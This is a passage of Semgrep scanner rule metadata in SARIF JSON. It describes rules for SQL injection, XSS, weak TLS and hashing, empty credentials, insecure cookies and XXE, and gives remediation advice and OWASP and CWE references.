cpp.lang.security.system-command.command-injection-path.command-injection-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url)\n - [https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html](https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","id":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","name":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","id":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","name":"go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.grpc.sql.grpc-pg-sqli-taint-med-conf.grpc-pg-sqli-taint-med-conf"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"help":{"markdown":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version)\n - [https://www.acunetix.com/blog/web-security-zone/hardening-nginx/](https://www.acunetix.com/blog/web-security-zone/hardening-nginx/)\n - [https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/](https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/)\n","text":"Detected use of an insecure SSL version. Secure SSL versions are TLSv1.2 and TLS1.3; older versions are known to be broken and are susceptible to attacks. Prefer use of TLSv1.2 or later."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-ssl-version.insecure-ssl-version","id":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","name":"generic.nginx.security.insecure-ssl-version.insecure-ssl-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-ssl-version.insecure-ssl-version"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"help":{"markdown":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql)\n - [https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL](https://docs.djangoproject.com/en/3.0/ref/models/expressions/#django.db.models.expressions.RawSQL)\n","text":"User-controlled data from request is passed to 'RawSQL()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use parameterized queries or escape the user-controlled data by using `params` and not using quote placeholders in the SQL string."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","id":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","name":"python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.sql.sql-injection-rawsql.sql-injection-using-rawsql"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"helpUri":"https://semgrep.dev/r/python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","id":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","name":"python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.db.generic-sql-fastapi.generic-sql-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","id":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","name":"ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-sentinels-empty-password.ruby-redis-sentinels-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"help":{"markdown":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)\n","text":"MD5 hash algorithm detected. This is not collision resistant and leads to easily-cracked password hashes. Replace with current recommended hashing algorithms."},"helpUri":"https://semgrep.dev/r/clojure.lang.security.use-of-md5.use-of-md5","id":"clojure.lang.security.use-of-md5.use-of-md5","name":"clojure.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: clojure.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli)\n - [https://github.com/jackc/pgx](https://github.com/jackc/pgx)\n - [https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool](https://pkg.go.dev/github.com/jackc/pgx/v4#hdr-Connection_Pool)\n","text":"Detected string concatenation with a non-literal variable in a pgx Go SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead. You can use parameterized queries like so: (`SELECT $1 FROM table`, `data1)"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","id":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","name":"go.lang.security.audit.sqli.pgx-sqli.pgx-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pgx-sqli.pgx-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"help":{"markdown":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an AWS Elasticsearch domain using an insecure version of TLS. To fix this, set \"tls_security_policy\" equal to \"Policy-Min-TLS-1-2-2019-07\"."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","id":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","name":"terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-elasticsearch-insecure-tls-version.aws-elasticsearch-insecure-tls-version"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"help":{"markdown":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint)\n - [https://docs.angularjs.org/api/ng/function/angular.element](https://docs.angularjs.org/api/ng/function/angular.element)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"Use of angular.element can lead to XSS if user-input is treated as part of the HTML element within `$SINK`. It is recommended to contextually output encode user-input, before inserting into `$SINK`. If the HTML needs to be preserved it is recommended to sanitize the input using $sce.getTrustedHTML or $sanitize."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","id":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","name":"javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-element-taint.detect-angular-element-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"help":{"markdown":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate)\n - [https://www.php.net/manual/en/function.openssl-decrypt.php](https://www.php.net/manual/en/function.openssl-decrypt.php)\n","text":"The function `openssl_decrypt` returns either a string of the decrypted data on success or `false` on failure. If the failure case is not handled, this could lead to undefined behavior in your application. Please handle the case where `openssl_decrypt` returns `false`."},"helpUri":"https://semgrep.dev/r/php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","id":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","name":"php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate","properties":{"precision":"very-high","tags":["CWE-252: Unchecked Return Value","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.audit.openssl-decrypt-validate.openssl-decrypt-validate"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pg.pg-empty-password.pg-empty-password","id":"go.secrets.pg.pg-empty-password.pg-empty-password","name":"go.secrets.pg.pg-empty-password.pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pg.pg-empty-password.pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"help":{"markdown":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.Request](https://docs.python.org/3/library/urllib.request.html#urllib.request.Request)\n","text":"Detected a 'urllib.request.Request()' object using an insecure transport protocol, 'http://'. This connection will not be encrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","id":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","name":"python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-request-object.insecure-request-object"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases."},"helpUri":"https://semgrep.dev/r/python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","id":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","name":"python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.web.fastapi-cookie-httponly-false.fastapi-cookie-httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"help":{"markdown":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration does not leverage the in-built public key pinning mechanisms. The application should consider leverage ATS public key pinning to ensure that the application only communicates to serves with an allow-listed certificate (and public key). By default the device will allow connections if the default trust store (CA store) posesses the right certificates. The number of accepted Certificate Authorities by default is hundreds. Using public key pinning vastly reduces the attack surface."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","id":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","name":"swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning","properties":{"precision":"very-high","tags":["CWE-296: Improper Following of a Certificate's Chain of Trust","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-pinning.ATS-consider-pinning"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"help":{"markdown":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode)\n - [https://cwe.mitre.org/data/definitions/327.html](https://cwe.mitre.org/data/definitions/327.html)\n - [https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358](https://learn.microsoft.com/en-us/dotnet/fundamentals/code-analysis/quality-rules/ca5358)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"`$TY` is setup to use the ECB cipher mode. This mode is insecure because it does not use an initialization vector (IV) and can leak information about the plaintext. Use a more secure scheme like `AesGcm` or a mode like `CipherMode.CTS`."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","id":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","name":"csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.crypto.ciphers.ecb-mode.ecb-mode"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","id":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","name":"php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity 